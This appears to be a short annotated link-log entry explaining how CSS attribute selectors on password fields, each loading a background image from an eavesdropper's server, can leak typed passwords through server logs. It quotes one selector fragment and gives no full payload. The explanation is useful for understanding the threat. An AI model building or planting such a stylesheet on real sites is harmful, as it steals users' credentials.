Glider from the game of Life, rising from the left




Topic: #keylogging

Misusing CSS to Capture Passwords As Users Enter Them


Cascading Style Sheets, considered as a domain-specific language, is powerful enough to enable malicious Web designers to detect and record plaintext entries in text fields of interactive Web pages as users type them in. The key idea is to use selectors like input[type="password"][value$="a"] and specify that the background-image should be loaded from some URL where the eavesdropper has access to the log. The log entry will appear whenever the last character that the user typed into a password field is a lower-case a. By providing ninety-five such selectors, each loading a different background image from the eavesdropper's server, the eavesdropper can check the log to see which images were requested and in what order, and infer the entered password from that list.

“maxchehab”, GitHub, February 20, 2018

#Cascading-Style-Sheets #keylogging #domain-specific-languages

Hashtag index

This work is licensed under a Creative Commons Attribution-ShareAlike License.

Atom feed

John David Stone (

created June 1, 2014 · last revised December 10, 2018